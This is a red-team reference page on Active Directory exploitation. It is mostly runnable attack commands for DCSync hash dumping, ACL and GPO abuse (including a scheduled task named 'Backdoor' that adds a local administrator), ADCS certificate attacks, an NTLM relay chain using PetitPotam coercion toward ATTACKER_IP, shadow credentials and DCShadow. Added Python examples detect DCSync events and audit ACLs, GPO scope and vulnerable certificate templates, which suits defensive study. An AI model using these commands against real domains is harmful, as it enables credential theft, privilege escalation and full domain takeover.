Exploitation

Active Directory Exploitation

Exploit Active Directory misconfigurations to escalate privileges and achieve domain dominance.

Tool Installation

Tool          | Purpose            | Install
------------- | ------------------ | ----------------------
secretsdump   | DCSync (Impacket)  | pip install impacket
Certipy       | ADCS attacks       | pip install certipy-ad
PowerView     | AD enumeration     | PowerSploit/Recon
SharpGPOAbuse | GPO exploitation   | github.com/FSecureLABS

Danger

Many of these attacks can cause significant impact. DCSync and DCShadow especially should be used carefully.

DCSync Attack

Impersonate a Domain Controller and request password hashes via replication. Requires Replicating Directory Changes permissions.

Required Permissions:

  • Replicating Directory Changes (DS-Replication-Get-Changes)
  • Replicating Directory Changes All (DS-Replication-Get-Changes-All)
  • Usually held by: Domain Admins, Enterprise Admins, DC machine accounts

Warning

Detection: DCSync triggers event ID 4662 with GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes) in the Properties field. SIEM rules commonly alert on this when the requesting account is not a domain controller.
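As an added example (not part of the original page), the detection logic the warning describes, run over constructed 4662 records: replication rights requested by any principal other than a known DC machine account are flagged. The DC account list is an assumption; a real deployment would pull it from the Domain Controllers OU.

```python
# Added example (not from the original page): flag DCSync-style replication
# requests in constructed Windows Security event 4662 records. Legitimate
# replication comes from a domain controller's machine account; any other
# principal requesting the DS-Replication-Get-Changes rights deserves an alert.
import re

# Control-access right GUIDs that a DCSync request exercises.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Assumed inventory of DC machine accounts (sAMAccountName); real deployments
# would pull this from the Domain Controllers OU.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

def is_dcsync_candidate(event, known_dcs=KNOWN_DC_ACCOUNTS):
    """True when a 4662 record requests replication rights from a non-DC principal."""
    if event.get("EventID") != 4662:
        return False
    # Properties carries the access list as "{guid} {guid} ..." text.
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    if not guids & REPLICATION_GUIDS:
        return False
    return event.get("SubjectUserName", "").upper() not in known_dcs

def find_dcsync(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """Filter a batch of parsed events down to DCSync candidates."""
    return [e for e in events if is_dcsync_candidate(e, known_dcs)]

# Constructed sample records shaped like the fields of a parsed 4662 event.
REPL_PROPS = ("{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
     "ObjectType": "domainDNS", "Properties": REPL_PROPS},       # normal replication
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "ObjectType": "domainDNS", "Properties": REPL_PROPS},       # DCSync from a user
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "ObjectType": "user", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "Properties": ""},                                           # unrelated logon
]

if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_EVENTS):
        print(f"ALERT DCSync: {hit['SubjectDomainName']}\\{hit['SubjectUserName']}")
```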

secretsdump (Impacket)

bash
# DCSync all domain hashes
secretsdump.py corp.local/admin:password@dc.corp.local

# DCSync specific user (stealthier)
secretsdump.py -just-dc-user krbtgt corp.local/admin:password@dc.corp.local
secretsdump.py -just-dc-user Administrator corp.local/admin:password@dc.corp.local

# DCSync with hash (Pass-the-Hash)
secretsdump.py -hashes :NTLM_HASH corp.local/admin@dc.corp.local

# DCSync with Kerberos ticket
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass dc.corp.local

# Output NTLM hashes only (smaller output)
secretsdump.py -just-dc-ntlm corp.local/admin:password@dc.corp.local

# Output includes:
# - NTLM hashes for all users
# - Kerberos keys (AES256, AES128, DES)
# - Cleartext passwords (if reversible encryption enabled)
# - Password history

Mimikatz DCSync

text
# DCSync specific user
mimikatz# lsadump::dcsync /domain:corp.local /user:Administrator

# DCSync krbtgt (for Golden Ticket)
mimikatz# lsadump::dcsync /domain:corp.local /user:krbtgt

# DCSync all users to CSV
mimikatz# lsadump::dcsync /domain:corp.local /all /csv

# DCSync with alternate credentials
mimikatz# lsadump::dcsync /domain:corp.local /user:Administrator /authuser:admin /authpassword:Password123 /authdomain:corp.local

# Output includes NTLM hash, AES keys, and password last set
# Look for 'Hash NTLM:' in output

ACL Abuse

Active Directory objects have Access Control Lists that define permissions. Misconfigured ACLs can lead to privilege escalation.

Dangerous Rights:

  • GenericAll - Full control over object
  • GenericWrite - Write any property
  • WriteDacl - Modify permissions
  • WriteOwner - Change object owner
  • ForceChangePassword - Reset password without knowing current
  • AddMember - Add members to group

Find Abusable ACLs

powershell
# PowerView - Find interesting ACLs on all objects
Import-Module .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGUIDs | Out-File acls.txt

# ACLs for specific group (Domain Admins)
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner|GenericWrite"}

# ACLs where your user has rights
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq (Get-DomainUser attacker).objectsid}

# Find users with DCSync rights
Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -ResolveGUIDs | Where-Object {$_.ObjectAceType -match 'DS-Replication'}

# BloodHound cypher query - shortest path to Domain Admins
MATCH p=shortestPath((u:User {name:'ATTACKER@CORP.LOCAL'})-[*1..]->(g:Group {name: 'DOMAIN ADMINS@CORP.LOCAL'})) RETURN p
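The defender's counterpart to the enumeration above, as an added example (not from the original page): an audit over ACE records shaped like PowerView's Get-DomainObjectAcl -ResolveGUIDs output that reports the dangerous rights listed in this section when they are held by principals outside an assumed allowlist. The principal names and DNs are constructed.

```python
# Added example (not part of the original page): audit ACEs exported from AD
# (record shape modelled on PowerView's Get-DomainObjectAcl -ResolveGUIDs output)
# and report the dangerous rights listed above whenever a principal outside an
# assumed allowlist of expected privileged identities holds them.

DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
DANGEROUS_EXTENDED = {  # ObjectAceType names after GUID resolution
    "User-Force-Change-Password": "ForceChangePassword",
    "DS-Replication-Get-Changes": "DCSync (Get-Changes)",
    "DS-Replication-Get-Changes-All": "DCSync (Get-Changes-All)",
}
EXPECTED_PRINCIPALS = {  # assumed allowlist; tune it to the real tiering model
    "CORP\\Domain Admins", "CORP\\Enterprise Admins", "BUILTIN\\Administrators",
    "NT AUTHORITY\\SYSTEM", "CORP\\Domain Controllers"}

def classify_ace(ace):
    """Return sorted finding labels for one ACE (empty when nothing is wrong)."""
    if ace.get("AceType", "AccessAllowed").startswith("AccessDenied"):
        return []  # deny ACEs never grant anything
    if ace["IdentityReference"] in EXPECTED_PRINCIPALS:
        return []
    rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
    obj_type = ace.get("ObjectAceType", "None")
    findings = list(rights & DANGEROUS_RIGHTS)
    if "ExtendedRight" in rights and obj_type in DANGEROUS_EXTENDED:
        findings.append(DANGEROUS_EXTENDED[obj_type])
    if "Self" in rights and obj_type == "Self-Membership":
        findings.append("AddMember")  # validated write: add self to the group
    return sorted(findings)

def audit_acl(aces):
    """Map (object DN, principal) -> findings for every ACE worth reporting."""
    report = {}
    for ace in aces:
        findings = classify_ace(ace)
        if findings:
            report[(ace["ObjectDN"], ace["IdentityReference"])] = findings
    return report

# Constructed sample export for a fictional corp.local domain.
ROOT, DA_DN = "DC=corp,DC=local", "CN=Domain Admins,CN=Users,DC=corp,DC=local"
USER_DN = "CN=jdoe,CN=Users,DC=corp,DC=local"
SAMPLE_ACES = [
    {"ObjectDN": ROOT, "IdentityReference": "CORP\\Domain Controllers",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": "DS-Replication-Get-Changes-All"},
    {"ObjectDN": ROOT, "IdentityReference": "CORP\\svc_backup",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": "DS-Replication-Get-Changes-All"},
    {"ObjectDN": DA_DN, "IdentityReference": "CORP\\helpdesk",
     "ActiveDirectoryRights": "WriteDacl, WriteOwner", "ObjectAceType": "None"},
    {"ObjectDN": DA_DN, "IdentityReference": "CORP\\svc_backup",
     "ActiveDirectoryRights": "Self", "ObjectAceType": "Self-Membership"},
    {"ObjectDN": USER_DN, "IdentityReference": "CORP\\helpdesk",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": "User-Force-Change-Password"},
    {"ObjectDN": USER_DN, "IdentityReference": "CORP\\contractors",
     "ActiveDirectoryRights": "GenericAll", "ObjectAceType": "None", "AceType": "AccessDenied"},
]

if __name__ == "__main__":
    for (dn, who), findings in audit_acl(SAMPLE_ACES).items():
        print(f"{who} -> {dn}: {', '.join(findings)}")
```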

GenericAll Abuse

With GenericAll, you have full control. The exploitation depends on the target object type.

powershell
# GenericAll on USER - Reset password
net user targetuser NewPassword123! /domain

# PowerView password reset
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)

# Or set SPN and Kerberoast
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
GetUserSPNs.py corp.local/attacker:password -dc-ip DC_IP -request-user targetuser

# Or set "Don't require preauth" and AS-REP roast
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}
GetNPUsers.py corp.local/targetuser -dc-ip DC_IP -no-pass

# GenericAll on GROUP - Add yourself as member
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'attacker'
net group "Domain Admins" attacker /add /domain

# GenericAll on COMPUTER - RBCD attack
# See Kerberos section for full RBCD chain
rbcd.py -delegate-to TARGET$ -delegate-from YOURPC$ -dc-ip DC_IP corp.local/attacker:password -action write

WriteDACL Abuse

WriteDACL allows modifying permissions - grant yourself any right you need.

powershell
# Grant yourself DCSync rights on domain root
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' -PrincipalIdentity attacker -Rights DCSync

# Now perform DCSync
secretsdump.py corp.local/attacker:password@dc.corp.local

# Grant GenericAll on target user
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity attacker -Rights All

# Then reset their password
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)

# Impacket dacledit.py (remote)
dacledit.py -action 'write' -rights 'DCSync' -principal 'attacker' -target-dn 'DC=corp,DC=local' corp.local/user:password

WriteOwner Abuse

powershell
# Take ownership
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity attacker

# Then grant yourself rights
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity attacker -Rights All

GPO Abuse

Group Policy Objects push configurations to computers and users. If you can modify a GPO, you can compromise all systems in its scope.

Tip

High Impact: A GPO linked to the domain root affects ALL computers. Always check the GPO's scope before exploiting.

Find Modifiable GPOs

powershell
# Find GPOs where you have write access
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner"}

# Check which OUs a GPO applies to
Get-DomainGPO -Identity "VulnerableGPO" | ForEach-Object { Get-DomainOU -GPLink $_.distinguishedname }

# Or check which computers are in those OUs
Get-DomainOU -GPLink "CN={GPO-GUID},CN=Policies,CN=System,DC=corp,DC=local" | ForEach-Object { Get-DomainComputer -SearchBase $_.distinguishedname }

# BloodHound query - GPO control
MATCH p=(u:User)-[:GenericAll|GenericWrite|WriteOwner|WriteDacl]->(g:GPO) RETURN p
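The scope check the Tip above asks for, as an added example (not from the original page): a parser for raw gPLink attribute values, the data behind PowerView's -GPLink lookup, that reports which containers link a given GPO and whether each link is enforced or disabled. The export and the GUID of "VulnerableGPO" are constructed.

```python
# Added example (not from the original page): parse raw gPLink attribute values,
# the data behind PowerView's -GPLink lookup, to answer the Tip above: which
# containers link a given GPO and whether each link is enforced or disabled.
# The export and the GUID of "VulnerableGPO" are constructed, not real values.
import re

LINK_RE = re.compile(r"\[LDAP://(?P<dn>[^;\]]+);(?P<flags>\d+)\]", re.IGNORECASE)
GUID_IN_DN_RE = re.compile(r"cn=\{([0-9A-F-]{36})\}", re.IGNORECASE)

LINK_DISABLED = 0x1  # gPLink option bit: link present but ignored
LINK_ENFORCED = 0x2  # gPLink option bit: link cannot be blocked lower down

def parse_gplink(value):
    """Return [(gpo_guid, enforced, disabled), ...] in stored order."""
    links = []
    for m in LINK_RE.finditer(value or ""):
        guid = GUID_IN_DN_RE.search(m.group("dn"))
        if not guid:
            continue  # malformed entry: skip instead of crashing the audit
        flags = int(m.group("flags"))
        links.append((guid.group(1).upper(),
                      bool(flags & LINK_ENFORCED), bool(flags & LINK_DISABLED)))
    return links

def gpo_scope(gpo_guid, gplinks_by_container):
    """Containers that actively link gpo_guid (disabled links are skipped)."""
    gpo_guid = gpo_guid.upper()
    scope = []
    for container_dn, gplink in gplinks_by_container.items():
        for guid, enforced, disabled in parse_gplink(gplink):
            if guid == gpo_guid and not disabled:
                scope.append({"container": container_dn, "enforced": enforced,
                              "domain_root": container_dn.upper().startswith("DC=")})
    return scope

# Constructed sample: {container DN: gPLink} for a fictional corp.local domain.
VULN_GPO = "11111111-2222-3333-4444-555555555555"  # hypothetical VulnerableGPO GUID
POLICIES = ",cn=policies,cn=system,DC=corp,DC=local"
SAMPLE_GPLINKS = {
    "DC=corp,DC=local":
        "[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9}" + POLICIES + ";0]",
    "OU=Workstations,DC=corp,DC=local":
        "[LDAP://cn={" + VULN_GPO + "}" + POLICIES + ";2]",   # enforced link
    "OU=Servers,DC=corp,DC=local":
        "[LDAP://cn={" + VULN_GPO + "}" + POLICIES + ";1]"    # disabled link
        "[LDAP://cn={6AC1786C-016F-11D2-945F-00C04FB984F9}" + POLICIES + ";0]",
    "OU=Finance,DC=corp,DC=local": "",                        # no links at all
}

if __name__ == "__main__":
    for hit in gpo_scope(VULN_GPO, SAMPLE_GPLINKS):
        print(hit)
```

A hit whose container starts with DC= is a domain-root link, the case the Tip calls high impact.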

SharpGPOAbuse

SharpGPOAbuse automates GPO modification attacks. Changes take effect at next GPO refresh (every 90 mins) or on reboot.

powershell
# Download: https://github.com/FSecureLABS/SharpGPOAbuse/releases

# Add local admin via GPO (immediate effect on next gpupdate)
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "VulnerableGPO"

# Add startup script (runs as SYSTEM on boot)
SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "net localgroup administrators attacker /add" --GPOName "VulnerableGPO"

# Create immediate scheduled task (faster than waiting for gpupdate)
SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net localgroup administrators attacker /add" --GPOName "VulnerableGPO"

# Add user rights assignment
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "VulnerableGPO"

# Force GPO update on target (if you have access)
gpupdate /force

ADCS Attacks (Certipy)

Active Directory Certificate Services can be abused to escalate privileges. Multiple vulnerabilities exist (ESC1-ESC13).

Common ESC Vulnerabilities:

  • ESC1 - Template allows SAN and Client Auth
  • ESC4 - Vulnerable template ACLs
  • ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 flag
  • ESC7 - Vulnerable CA ACLs
  • ESC8 - NTLM relay to web enrollment

Find Vulnerable Templates

bash
# Install Certipy
pip install certipy-ad

# Enumerate all ADCS information
certipy find -u user@corp.local -p password -dc-ip DC_IP
certipy find -u user@corp.local -p password -dc-ip DC_IP -json  # JSON output

# Find only vulnerable templates (recommended)
certipy find -u user@corp.local -p password -dc-ip DC_IP -vulnerable

# Output shows ESC vulnerabilities by number
# Look for: [!] Vulnerabilities
# ESC1, ESC2, etc. with detailed explanation

ESC1 - Misconfigured Templates

Template allows specifying Subject Alternative Name (SAN) in request, enabling impersonation of any user.

bash
# Request certificate impersonating Administrator
certipy req -u user@corp.local -p password -ca corp-CA -target ca.corp.local -template VulnerableTemplate -upn administrator@corp.local

# Certificate saved as administrator.pfx

# Authenticate with certificate to get TGT and NT hash
certipy auth -pfx administrator.pfx -dc-ip DC_IP

# Output: Got hash and saved TGT to administrator.ccache
# Hash NTLM: aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

# Use hash for Pass-the-Hash
psexec.py -hashes :NTLM_HASH Administrator@dc.corp.local

# Or use TGT
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass dc.corp.local
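As an added example (not from the original page or Certipy), the template and CA checks behind the ESC1 condition described in this section and the ESC6 flag listed above, written as a defender would run them over an exported template: the flag constants are the documented msPKI-* and EditFlags bits, while the template, CA and principal names are constructed.

```python
# Added example (not from the original page): evaluate a certificate template and
# a CA's policy flags for the ESC1 and ESC6 conditions described above, the
# checks a defender runs over a template export. Flag constants are the documented
# msPKI-*/EditFlags bits; the template, CA and principal names are constructed.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag (manager approval)
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000     # CA EditFlags (ESC6)

# EKUs that let a certificate authenticate to the domain.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Assumed set of principals whose enrollment rights are expected.
PRIVILEGED = {"CORP\\Domain Admins", "CORP\\Enterprise Admins"}

def allows_auth(ekus):
    """An empty EKU list means any purpose, which includes authentication."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)

def check_esc1(template):
    """Return the ESC1 conditions that hold; all four together make the template ESC1."""
    reasons = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject (SAN)")
    if allows_auth(template["pKIExtendedKeyUsage"]):
        reasons.append("authentication EKU")
    if (not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
            and template["msPKI-RA-Signature"] == 0):
        reasons.append("no approval or signature required")
    low_priv = sorted(set(template["EnrollmentRights"]) - PRIVILEGED)
    if low_priv:
        reasons.append("enrollable by " + ", ".join(low_priv))
    return reasons

def is_esc1(template):
    return len(check_esc1(template)) == 4

def is_esc6(ca):
    """ESC6: the CA honours a SAN passed as a request attribute on every template."""
    return bool(ca["EditFlags"] & EDITF_ATTRIBUTESUBJECTALTNAME2)

# Constructed samples shaped like an exported template and CA object.
VULNERABLE_TEMPLATE = {
    "name": "VulnerableTemplate", "msPKI-Certificate-Name-Flag": 0x1,
    "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "EnrollmentRights": ["CORP\\Domain Users", "CORP\\Domain Admins"],
}
# Same template with manager approval required: ESC1 no longer holds.
SAFE_TEMPLATE = dict(VULNERABLE_TEMPLATE, name="Reviewed", **{"msPKI-Enrollment-Flag": 0x2})
VULNERABLE_CA = {"name": "corp-CA", "EditFlags": EDITF_ATTRIBUTESUBJECTALTNAME2}
SAFE_CA = {"name": "corp-CA", "EditFlags": 0x0}  # other EditFlags bits omitted

if __name__ == "__main__":
    for t in (VULNERABLE_TEMPLATE, SAFE_TEMPLATE):
        print(t["name"], "ESC1" if is_esc1(t) else "ok", check_esc1(t))
    print(VULNERABLE_CA["name"], "ESC6" if is_esc6(VULNERABLE_CA) else "ok")
```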

ESC4 - Template ACL Abuse

bash
# Modify template to be vulnerable
certipy template -u user@corp.local -p password -template VulnerableTemplate -save-old

# Request certificate
certipy req -u user@corp.local -p password -ca corp-CA -target ca.corp.local -template VulnerableTemplate -upn administrator@corp.local

# Restore template
certipy template -u user@corp.local -p password -template VulnerableTemplate -configuration VulnerableTemplate.json

ESC8 - NTLM Relay to ADCS

Relay NTLM authentication to ADCS web enrollment to get a certificate as the relayed user.

bash
# Terminal 1: Start relay to ADCS web enrollment
sudo ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: Coerce DC authentication (PetitPotam)
python PetitPotam.py ATTACKER_IP DC_IP

# ntlmrelayx outputs Base64 certificate
# Save and convert
echo 'BASE64...' | base64 -d > dc.pfx

# Or use certipy to request directly
# Authenticate with DC certificate
certipy auth -pfx dc.pfx -dc-ip DC_IP

# Now you have DC machine account hash - DCSync!
secretsdump.py -hashes :DC_NTLM_HASH corp.local/DC$@DC_IP

Tip

ESC8 Attack Chain: Coerce DC → Relay to ADCS → Get DC cert → Auth as DC → DCSync all hashes = Full domain compromise

Shadow Credentials

Add a "shadow" certificate credential to an account's msDS-KeyCredentialLink attribute. Requires GenericWrite on target.

Requirements:

  • Write access to target's msDS-KeyCredentialLink attribute
  • Domain must have ADCS or Azure AD
  • Target must be a user or computer account

bash
# Certipy shadow credentials (auto mode - easiest)
certipy shadow auto -u attacker@corp.local -p password -account targetuser
# Outputs: Saved certificate and NTLM hash

# Manual steps
certipy shadow add -u attacker@corp.local -p password -account targetuser
certipy shadow auth -pfx targetuser.pfx -dc-ip DC_IP

# Pywhisker alternative
git clone https://github.com/ShutdownRepo/pywhisker.git
python pywhisker.py -d corp.local -u attacker -p password --target targetuser --action add

# List shadow credentials
python pywhisker.py -d corp.local -u attacker -p password --target targetuser --action list

# Remove shadow credential (cleanup)
certipy shadow remove -u attacker@corp.local -p password -account targetuser -device-id DEVICE_ID

DCShadow (Risky)

Danger

DCShadow modifies AD directly and can cause replication issues. Use only in authorized lab environments.

text
# Register rogue DC and push changes
mimikatz# lsadump::dcshadow /object:targetuser /attribute:primaryGroupId /value:512

# In another mimikatz instance (as SYSTEM on DC)
mimikatz# lsadump::dcshadow /push

External Resources